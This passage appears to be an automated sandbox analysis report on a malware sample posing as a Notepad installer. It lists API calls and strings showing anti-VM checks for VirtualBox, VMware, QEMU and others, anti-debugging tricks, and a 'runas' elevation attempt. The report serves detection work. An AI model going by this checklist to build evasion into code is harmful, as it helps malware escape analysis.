                                      • GetCurrentThread.KERNEL32 ref: 006E9B5C
                                      • NtQueryInformationThread.NTDLL(00000000), ref: 006E9B5F
                                      • GetCurrentThread.KERNEL32 ref: 006E9B75
                                      • NtQueryInformationThread.NTDLL(00000000), ref: 006E9B78
                                        • Part of subcall function 006E94C5: VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000003), ref: 006E952C
                                        • Part of subcall function 006E94C5: VerSetConditionMask.NTDLL(00000000), ref: 006E9530
                                        • Part of subcall function 006E94C5: VerSetConditionMask.NTDLL(00000000), ref: 006E9534
                                        • Part of subcall function 006E94C5: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 006E955D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Thread$Information$Current$ConditionMaskQuery$InfoVerifyVersion
                                      • String ID:
                                      • API String ID: 4235557872-0
                                      • Opcode ID: 150b1c2e1514b225aebafee7c12d2fd54f476e077f165fc7b069160a198f77e4
                                      • Instruction ID: 20b07933a419e5b70e4259c5caace6418ced4033c3993b2e94227ce545b31266
                                      • Opcode Fuzzy Hash: 150b1c2e1514b225aebafee7c12d2fd54f476e077f165fc7b069160a198f77e4
                                      • Instruction Fuzzy Hash: 97216FB1A01348BAEB209FE69C89EBF7A6EDF40755F10542AF205E2140D6B49A41DA31
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.NTDLL ref: 006EAC5A
                                      • memcpy.NTDLL(?,006E84A4,0000000C,?,00000000,00000040,000000FF,40000000,00000000,006EA46B), ref: 006EAC69
                                      • strcmp.NTDLL ref: 006EAC7C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcpymemsetstrcmp
                                      • String ID: KVMKVMKVM$Microsoft Hv$Parallels Hv$VBoxVBoxVBox$VMwareVMware$XenVMMXenVMM$prl hyperv
                                      • API String ID: 805727082-2718720060
                                      • Opcode ID: c13e1411afb9809f6c6c20e6dfb7eafcfbe035f45bf6054e22c15d3b29e929d4
                                      • Instruction ID: 6b40f5b5841bc497d31bf23fa5d466a2a9ad25e0c0285d620a901ffb1b6b72ba
                                      • Opcode Fuzzy Hash: c13e1411afb9809f6c6c20e6dfb7eafcfbe035f45bf6054e22c15d3b29e929d4
                                      • Instruction Fuzzy Hash: 8F11C272C0170DAADB10DFEADC09AEFBFBEAB08324F104225E315B6140D37066088BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@$mallocmemset
                                      • String ID: IPCA$VBOX$VirtualBox$vbox
                                      • API String ID: 1993750426-3862313162
                                      • Opcode ID: 99da7f94fa9bd4141152e904fc43d87f2d128e9eb49484ab51230e5c14ab7a48
                                      • Instruction ID: b304b861ad263c12ecfa4ab78e25a6e41ed4558bf58fc92f0c9c8cb9a940e748
                                      • Opcode Fuzzy Hash: 99da7f94fa9bd4141152e904fc43d87f2d128e9eb49484ab51230e5c14ab7a48
                                      • Instruction Fuzzy Hash: C221FB31D42395FBEF2467968C46BEF7A7BDF01330F200065F901A1381E7774A0186A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006E98DD: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,006EB5D1), ref: 006E98F3
                                        • Part of subcall function 006E98DD: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006E98FF
                                        • Part of subcall function 006E98DD: GetCurrentProcess.KERNEL32(00000000,?,?,006EB5D1), ref: 006E9912
                                      • ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104,00000000,006EC4B1), ref: 006EC461
                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000026,00000000,00000000,006EC4B1), ref: 006EC476
                                      • PathCombineW.SHLWAPI(?,?,Pdo,do), ref: 006EC48C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Path$AddressCombineCurrentEnvironmentExpandFolderHandleModuleProcProcessSpecialStrings
                                      • String ID: %ProgramW6432%$Pdo,do$SPICE Guest Tools$qemu-ga
                                      • API String ID: 949058988-571663051
                                      • Opcode ID: 51acedf2a20287d029cf801bbb4251dd798a4acd375a4c98c9b931b7ce7c677d
                                      • Instruction ID: ac5bc0b0b55b4f17beba55b7d8bb5a48c000bdeb1da04f9dbe91a2dc5695ed16
                                      • Opcode Fuzzy Hash: 51acedf2a20287d029cf801bbb4251dd798a4acd375a4c98c9b931b7ce7c677d
                                      • Instruction Fuzzy Hash: 2D01757154130DAADB10EF95DC89FFA77BDEF04715F104469FB05D2080D7B09A868A61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateFileW.KERNEL32(006F5D18,80000000,00000001,00000000,00000003,00000080,00000000), ref: 006EB68E
                                      • CloseHandle.KERNEL32(00000000), ref: 006EB6A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateFileHandle
                                      • String ID: \\.\VBoxGuest$\\.\VBoxMiniRdrDN$\\.\VBoxTrayIPC$\\.\pipe\VBoxMiniRdDN$\\.\pipe\VBoxTrayIPC
                                      • API String ID: 3498533004-1722504159
                                      • Opcode ID: 27bec6b001006b70028f48553288961ceba0b3825c1b64dae8addca34ab96091
                                      • Instruction ID: 4d2e99f33422a047a6d519b3bfa7dbbd361150d6acd732d0c43b28fa1cf76687
                                      • Opcode Fuzzy Hash: 27bec6b001006b70028f48553288961ceba0b3825c1b64dae8addca34ab96091
                                      • Instruction Fuzzy Hash: 39F05E71941728BAEB109FA99C19BEF7FA7AB04719F604558AB13BA1D0C3F04A448B94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • HARDWARE\ACPI\FADT\VBOX__, xrefs: 006EB4A3
                                      • SYSTEM\ControlSet001\Services\VBoxVideo, xrefs: 006EB4D4
                                      • SOFTWARE\Oracle\VirtualBox Guest Additions, xrefs: 006EB4B1
                                      • SYSTEM\ControlSet001\Services\VBoxMouse, xrefs: 006EB4BF
                                      • HARDWARE\ACPI\DSDT\VBOX__, xrefs: 006EB49C
                                      • HARDWARE\ACPI\RSDT\VBOX__, xrefs: 006EB4AA
                                      • SYSTEM\ControlSet001\Services\VBoxService, xrefs: 006EB4C6
                                      • SYSTEM\ControlSet001\Services\VBoxGuest, xrefs: 006EB4B8
                                      • SYSTEM\ControlSet001\Services\VBoxSF, xrefs: 006EB4CD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpen
                                      • String ID: HARDWARE\ACPI\DSDT\VBOX__$HARDWARE\ACPI\FADT\VBOX__$HARDWARE\ACPI\RSDT\VBOX__$SOFTWARE\Oracle\VirtualBox Guest Additions$SYSTEM\ControlSet001\Services\VBoxGuest$SYSTEM\ControlSet001\Services\VBoxMouse$SYSTEM\ControlSet001\Services\VBoxSF$SYSTEM\ControlSet001\Services\VBoxService$SYSTEM\ControlSet001\Services\VBoxVideo
                                      • API String ID: 47109696-1071494954
                                      • Opcode ID: 7e46a67079aa8a7dc73ad67b319500fd7cddd897ed6efd8221699040657c46a2
                                      • Instruction ID: 913d58b966950f6d71086bd7f2e372037218ef384c0a88e4d1e6d5b425b7d9e2
                                      • Opcode Fuzzy Hash: 7e46a67079aa8a7dc73ad67b319500fd7cddd897ed6efd8221699040657c46a2
                                      • Instruction Fuzzy Hash: 39F04F7190161DDADB009F8698494EFBFFAEB04368FA05019D76276250C3B05E488FD0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00004000,00003000,00000004), ref: 006EA265
                                      • VirtualAlloc.KERNEL32(00000000,01000000,00203000,00000004), ref: 006EA27B
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006EA28C
                                      • IsDebuggerPresent.KERNEL32 ref: 006EA296
                                      • GetWriteWatch.KERNEL32(00000000,00000000,00001000,?,?,?), ref: 006EA2B4
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006EA2E9
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 006EA2EF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Free$Alloc$DebuggerPresentWatchWrite
                                      • String ID:
                                      • API String ID: 1675568409-0
                                      • Opcode ID: 4cfbc09e4d0f7669f14ced8bff5dd1c601a1208c25bf5f08d62444ce8754c254
                                      • Instruction ID: de631fe267067f869cd32c006630bdd5cd17bf02e890b7478c771947f18afacb
                                      • Opcode Fuzzy Hash: 4cfbc09e4d0f7669f14ced8bff5dd1c601a1208c25bf5f08d62444ce8754c254
                                      • Instruction Fuzzy Hash: A611E270A01364BFDB229BA59C45FAEBFB9EF04750F244065F201F2180C6706A00DF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.NTDLL ref: 006E4360
                                      • ShellExecuteExW.SHELL32(?), ref: 006E4399
                                      • CloseHandle.KERNEL32(?,?,?,00000000), ref: 006E43A8
                                      • GetLastError.KERNEL32(?,?,00000000), ref: 006E43B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseErrorExecuteHandleLastShellmemset
                                      • String ID: @$runas
                                      • API String ID: 3899250325-1829409388
                                      • Opcode ID: 2108b3741fc2b498ccb81ff5f8b5b6157d763ed6b2da3de0a66d80f31f40cd0c
                                      • Instruction ID: 3660aa0414beaa09e87fe2261651e45adbd8c94638a334084448506efc038010
                                      • Opcode Fuzzy Hash: 2108b3741fc2b498ccb81ff5f8b5b6157d763ed6b2da3de0a66d80f31f40cd0c
                                      • Instruction Fuzzy Hash: BA015676D01229ABCB10AFAAE819BDEBBBAAF44724F004015F904E7254DB709900CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetSystemInfo.KERNEL32(?), ref: 006E9CA3
                                      • GetModuleHandleExW.KERNEL32(00000004,006E9C88,?), ref: 006E9CBA
                                      • GetCurrentProcess.KERNEL32(?,?,0000000C), ref: 006E9CD1
                                      • GetModuleInformation.PSAPI(00000000), ref: 006E9CD8
                                      • VirtualQuery.KERNEL32(?,00000000,0000001C,00000000), ref: 006E9CF7
                                      • VirtualQuery.KERNEL32(00000000,00000000,0000001C,00000000), ref: 006E9D6E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ModuleQueryVirtual$CurrentHandleInfoInformationProcessSystem
                                      • String ID:
                                      • API String ID: 2307031642-0
                                      • Opcode ID: 8e72614688483fc19af735dbb0347378fd3d1c8fc9f887407336084860547a47
                                      • Instruction ID: a9f6bbc88149fe8ee2e65b09c6b1dcf3c66355ecd83ad5a9b04c805fcf031df9
                                      • Opcode Fuzzy Hash: 8e72614688483fc19af735dbb0347378fd3d1c8fc9f887407336084860547a47
                                      • Instruction Fuzzy Hash: 6F31B372B11A699BEF249AEACCA5BFE73E7EF44300F540425E502E63C5D6785C80C760
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006E9224
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 006E923E
                                      • Process32NextW.KERNEL32(00000000,?), ref: 006E9261
                                      • StrCmpIW.SHLWAPI(?,006F5DD8,00000002,006F5DD8), ref: 006E9274
                                      • CloseHandle.KERNEL32(00000000), ref: 006E927B
                                      • CloseHandle.KERNEL32(00000000,00000002,006F5DD8), ref: 006E928A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 1789362936-0
                                      • Opcode ID: e6756140c3adfd2404da5d811585ef14a627fd0104a850ed6781f1d704d66669
                                      • Instruction ID: 9bd5468003623a0b101d75335f782bb3b35611b161b65967d2bd88b1af5a3fe2
                                      • Opcode Fuzzy Hash: e6756140c3adfd2404da5d811585ef14a627fd0104a850ed6781f1d704d66669
                                      • Instruction Fuzzy Hash: 4E01C4395012297EDF20A6659C48BFE3BBE9F49354F100195EE05E2291E6308E458EB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetSystemInfo.KERNEL32(?), ref: 006E97A5
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 006E97B6
                                      • memset.NTDLL ref: 006E97CD
                                      • VirtualProtect.KERNEL32(00000000,?,00000140,?), ref: 006E97E2
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 006E97FC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFreeInfoProtectSystemmemset
                                      • String ID:
                                      • API String ID: 48612997-0
                                      • Opcode ID: 22f0af5bd1907028aabeac7662f3d7097ebf987011f9c082e6dc29b8c88f3dba
                                      • Instruction ID: 9d2e648f5824f24cfa6433f5cc9809884e7a0395c8cf5a3017bb2fc3bdb1036a
                                      • Opcode Fuzzy Hash: 22f0af5bd1907028aabeac7662f3d7097ebf987011f9c082e6dc29b8c88f3dba
                                      • Instruction Fuzzy Hash: 51119072A41759ABDB118FA99C46FDEBB79BF04710F100529F601A22D0C7745942CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: 8Uo$HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0$HARDWARE\Description\System$Identifier$QEMU$SystemBiosVersion
                                      • API String ID: 3677997916-2078111225
                                      • Opcode ID: f2e8c83f5dd1ad005fe7a5aaaf647861c9670bfd4334796b186b9f40e09000ac
                                      • Instruction ID: a20985764e45d30f5afd9e198c2168ce52d00d623eaa429ac9cf9347de84ac5d
                                      • Opcode Fuzzy Hash: f2e8c83f5dd1ad005fe7a5aaaf647861c9670bfd4334796b186b9f40e09000ac
                                      • Instruction Fuzzy Hash: 02F0B472901708ABDB019F8E8D459EFFFBAEB00314F50442ADB15B6200E3B09E05CBD0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006E911C: malloc.MSVCRT ref: 006E9132
                                        • Part of subcall function 006E911C: memset.NTDLL ref: 006E9143
                                        • Part of subcall function 006E911C: GetSystemFirmwareTable.KERNEL32(?,?,00000000,00001000), ref: 006E9153
                                        • Part of subcall function 006E911C: ??3@YAXPAX@Z.MSVCRT ref: 006E9197
                                        • Part of subcall function 006E91CA: memcmp.NTDLL ref: 006E91E5
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EC001
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@$FirmwareSystemTablemallocmemcmpmemset
                                      • String ID: VBOX$VirtualBox$vbox
                                      • API String ID: 387942524-1078916713
                                      • Opcode ID: a5d8f5b71d4d2fb22b948768502f349e02e664b8f3221a672229f6de0d5e481c
                                      • Instruction ID: 77621e35eef380c6a1dd4a5f626134c30f393145b3c26552f38baed96ac142a0
                                      • Opcode Fuzzy Hash: a5d8f5b71d4d2fb22b948768502f349e02e664b8f3221a672229f6de0d5e481c
                                      • Instruction Fuzzy Hash: 3AF07832A02359B6EB3522478D0BFEF3A6FCF92760F100120FB04A5280FA728E00D1B5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006E9BE8: VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000001), ref: 006E9C4B
                                        • Part of subcall function 006E9BE8: VerSetConditionMask.NTDLL(00000000), ref: 006E9C4F
                                        • Part of subcall function 006E9BE8: VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 006E9C78
                                      • SetLastError.KERNEL32(0000029A), ref: 006E9BC5
                                      • OutputDebugStringW.KERNEL32(random), ref: 006E9BD0
                                      • GetLastError.KERNEL32 ref: 006E9BD6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConditionErrorLastMask$DebugInfoOutputStringVerifyVersion
                                      • String ID: random
                                      • API String ID: 1197728218-373021397
                                      • Opcode ID: bb3c12c79b13f88e9298c3f547ada4d26c99e44a441a5e442e9d899552cdf10e
                                      • Instruction ID: 35f48e1185840be64538d9b64fc1106e07f2310b9c21ee7ed03dccac557170a0
                                      • Opcode Fuzzy Hash: bb3c12c79b13f88e9298c3f547ada4d26c99e44a441a5e442e9d899552cdf10e
                                      • Instruction Fuzzy Hash: 5DE0CD3234531613D71027577C49FFB3B5F9F41B62F050016F608D4190C9804841C5B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindWindowW.USER32(VBoxTrayToolWndClass,00000000), ref: 006EB6C0
                                      • FindWindowW.USER32(00000000,VBoxTrayToolWnd), ref: 006EB6CB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FindWindow
                                      • String ID: VBoxTrayToolWnd$VBoxTrayToolWndClass
                                      • API String ID: 134000473-1325860762
                                      • Opcode ID: 752db8f584e782c582f798e3030e46161d29f0999919a1f860e985d16df815d2
                                      • Instruction ID: 643dcf997c15a8aff1b4b3923c1b8e5cf533775b401ea372cc76a0ca375cf857
                                      • Opcode Fuzzy Hash: 752db8f584e782c582f798e3030e46161d29f0999919a1f860e985d16df815d2
                                      • Instruction Fuzzy Hash: B5D0C72778335562DA3131566C1AF9B0A679FD4BE1F511456F700D72D0D6905C0199A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                      • String ID: VGAuthService.exe$vmacthlp.exe$vmtoolsd.exe$vmwaretray.exe$vmwareuser.exe
                                      • API String ID: 1083639309-300419568
                                      • Opcode ID: ff0610795d247e5bc6799d496a97fe725afe16003f8fd652fe60b66451d3366e
                                      • Instruction ID: 6be3c6ba3a4d0b1519ea56be3c9ea53a33d745b813bbfed08cd89c9be9675636
                                      • Opcode Fuzzy Hash: ff0610795d247e5bc6799d496a97fe725afe16003f8fd652fe60b66451d3366e
                                      • Instruction Fuzzy Hash: 5DE03072901248AADF10DF8AD8494EFBFB6EB40368B111069E615A6202D7B15A09CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 006E997D
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 006E9980
                                      • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 006E99A6
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 006E99A9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentInformationQuery
                                      • String ID:
                                      • API String ID: 3953534283-0
                                      • Opcode ID: cf812fceb9799acf50de0112a3141755bd3a4dcfae942422fd71969b97a90d16
                                      • Instruction ID: 3dfc912f0e0bc7b15da4ccf7571d315d6851d338496b44ec4f896d993c553bf0
                                      • Opcode Fuzzy Hash: cf812fceb9799acf50de0112a3141755bd3a4dcfae942422fd71969b97a90d16
                                      • Instruction Fuzzy Hash: 86F08172601258FBEB20C691DC09BEE776EDB80765F28506AA601E2180D6B49BC4D671
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006E911C: malloc.MSVCRT ref: 006E9132
                                        • Part of subcall function 006E911C: memset.NTDLL ref: 006E9143
                                        • Part of subcall function 006E911C: GetSystemFirmwareTable.KERNEL32(?,?,00000000,00001000), ref: 006E9153
                                        • Part of subcall function 006E911C: ??3@YAXPAX@Z.MSVCRT ref: 006E9197
                                        • Part of subcall function 006E91CA: memcmp.NTDLL ref: 006E91E5
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EC506
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@$FirmwareSystemTablemallocmemcmpmemset
                                      • String ID: QEMU$qemu
                                      • API String ID: 387942524-3256932160
                                      • Opcode ID: 587adf202cdad98d0d6d4ce52210811320dd02699e004dab625c4604b2663f5f
                                      • Instruction ID: fb3de011e39532b391e38732ca182f25133865b441767a798e7c28de70ded1f8
                                      • Opcode Fuzzy Hash: 587adf202cdad98d0d6d4ce52210811320dd02699e004dab625c4604b2663f5f
                                      • Instruction Fuzzy Hash: 94F0B472A0125476DB25225B9C0BEEF7AAACFC2764F050064FB04E6240F5615F1181B5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _alloca_probe.NTDLL ref: 006E99FF
                                      • NtCreateDebugObject.NTDLL(?,001F000F,?), ref: 006E9A44
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 006E9A6D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateDebugHandleObject_alloca_probe
                                      • String ID:
                                      • API String ID: 3623914428-0
                                      • Opcode ID: 3bbe82a31ec90bd4e4b666e1d42e566006d316595cded1855240f90a431f91f8
                                      • Instruction ID: 63f81f424d06e9ae8880f6528fb40985f278ce852df292fb5cafe3f05a8b1ffe
                                      • Opcode Fuzzy Hash: 3bbe82a31ec90bd4e4b666e1d42e566006d316595cded1855240f90a431f91f8
                                      • Instruction Fuzzy Hash: 17115E71901298BFDB21DFA9CC859EEBBB9BB48300F5004B9E505E2240D6745B849EA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@NameUsermalloc
                                      • String ID:
                                      • API String ID: 2732050888-0
                                      • Opcode ID: 128752b477bff3fec0ce85bfa24de5bac92fc155de545e00243f0167075e5466
                                      • Instruction ID: 947b3ea5ccf2410cc6c4fccbf8b6654596c59bf23bc641e475a3903055c2da17
                                      • Opcode Fuzzy Hash: 128752b477bff3fec0ce85bfa24de5bac92fc155de545e00243f0167075e5466
                                      • Instruction Fuzzy Hash: 23E02672612222BBCB008FA5AC088EF779EDB067903044025F801D3280EB24DE00CAF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(006E9FDC), ref: 006E9FBD
                                      • RaiseException.KERNEL32(C000008E,00000000,00000000,00000000), ref: 006E9FCB
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006E9FD2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Exception$FilterUnhandled$Raise
                                      • String ID:
                                      • API String ID: 1301862105-0
                                      • Opcode ID: b75df30bbbabda63bea75545147b3454e9d49719b309c067504a5705cab5d8c1
                                      • Instruction ID: 4d60ecb433d994ab6b4e86fa8cce33df6f36d9a2af154787935abb59e6319f90
                                      • Opcode Fuzzy Hash: b75df30bbbabda63bea75545147b3454e9d49719b309c067504a5705cab5d8c1
                                      • Instruction Fuzzy Hash: 2CD0C9726200607FA74097B9BC04CBB26AEEB896213075056F900D3210CEA05C42CFB1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                      • String ID: qemu-ga.exe$vdagent.exe$vdservice.exe
                                      • API String ID: 1083639309-986563468
                                      • Opcode ID: 234737a64928141e8f093a9de34faa1e8181faffe8cb2787889eb438a675a497
                                      • Instruction ID: 3590a5ffa107295be5a3366aba5f4cf0a171bfddeb4e15222224d8e5e6b909af
                                      • Opcode Fuzzy Hash: 234737a64928141e8f093a9de34faa1e8181faffe8cb2787889eb438a675a497
                                      • Instruction Fuzzy Hash: ABE0D836A41348AADB119F9ED8554DFFFF9EB403A4F104079EA4062241E3719E0A86A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
